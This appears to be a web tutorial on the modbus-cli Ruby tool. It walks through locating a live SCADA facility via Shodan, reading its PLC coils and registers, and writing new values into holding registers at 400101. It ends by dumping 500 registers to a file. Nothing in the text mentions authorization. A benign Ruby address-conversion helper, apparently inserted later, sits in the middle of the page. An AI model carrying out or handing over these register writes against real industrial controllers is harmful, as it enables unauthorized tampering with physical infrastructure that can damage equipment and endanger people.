modbus-cli
This handy little Ruby tool is capable of enumerating the coils on a modbus installation as well as reading and writing to the memory registers.
gem install modbus-cli
Before we proceed, we need to take a minute to review some terminology. modbus-cli is designed to be used with both Modicon memory terminology and Schneider Electric's proprietary memory address terminology.
modbus --help
modbus read --help
modbus write --help
modbus dump --help
Once we have located a functioning SCADA facility via Shodan, let's try reading some of the values from that facility.
First, let's try using the Schneider Electric terminology. Schneider Electric uses %MW to designate a word in memory. Let's read the first 20 words from memory.
modbus read <IP address> %MW100 20
We can read the same registers using the Modicon terminology.
modbus read <IP address> 400101 20
If we want to read the double words, we can use Schneider's %MD terminology
modbus read <IP address> %MD100 20
Next, if we want to read the coils (remember, coils are either energized or not, so their values are either 0 or 1), we can use the Schneider Electric terminology for coils, %M.
We can also read the same coils using Modicon terminology (1-99999).
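To make the two address schemes above concrete, here is a small Ruby helper (added for this page, not part of modbus-cli) that converts between Schneider and Modicon addresses and works out which 0-based protocol registers a read or write of a given count will touch, so a request can be checked against the device's register map before it is sent. It assumes the mapping the page shows (%MW100 is 400101, and by the same offset %M100 is coil 101) and that a %MD/%MF item occupies two consecutive words.

```ruby
# Address kinds: :coil (Modicon 1-99999, Schneider %M) and :holding
# (Modicon 400001-465536, Schneider %MW/%MD/%MF). Assumption: Schneider
# numbers are 0-based, Modicon numbers are 1-based, as the page's examples show.
Address = Struct.new(:kind, :zero_based, :words) do
  def modicon
    kind == :coil ? zero_based + 1 : 400_001 + zero_based
  end

  def schneider
    return "%M#{zero_based}" if kind == :coil
    words == 2 ? "%MD#{zero_based}" : "%MW#{zero_based}"
  end
end

# Parse either notation into an Address; raises on anything else.
def parse_address(text)
  case text
  when /\A%M(\d+)\z/i     then Address.new(:coil, $1.to_i, 0)
  when /\A%MW(\d+)\z/i    then Address.new(:holding, $1.to_i, 1)
  when /\A%M[DF](\d+)\z/i then Address.new(:holding, $1.to_i, 2) # two words each
  when /\A\d+\z/
    n = text.to_i
    if n.between?(1, 99_999)           then Address.new(:coil, n - 1, 0)
    elsif n.between?(400_001, 465_536) then Address.new(:holding, n - 400_001, 1)
    else raise ArgumentError, "unsupported Modicon address #{text}"
    end
  else raise ArgumentError, "unrecognised address #{text}"
  end
end

# First and last 0-based protocol address a request for +count+ items covers.
# e.g. 20 double words from %MD100 touch holding registers 100..139.
def span(text, count)
  a = parse_address(text)
  per_item = a.kind == :coil ? 1 : a.words
  [a.zero_based, a.zero_based + count * per_item - 1]
end

if __FILE__ == $PROGRAM_NAME
  puts "%MW100 -> #{parse_address('%MW100').modicon}"   # 400101
  puts "400101 -> #{parse_address('400101').schneider}" # %MW100
  puts "span of 20 x %MD100: #{span('%MD100', 20).inspect}"
end
```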
Now that we have seen how we can read the values from a Modbus-enabled PLC site, let's see whether we can write values to the site. Remember, Modbus devices have at least two areas that we might be able to write to: the coils and the registers.
Let's see whether we can enter the value 2 in the six registers starting with 400101. To do so, we would enter:
modbus write <IP address> 400101 2 2 2 2 2 2
Now that we have written to those six registers, let's go back and read those same registers and see whether we have changed the values.
modbus read <IP address> 400101 20
modbus read --output datacapture.txt <IP address> 400101 500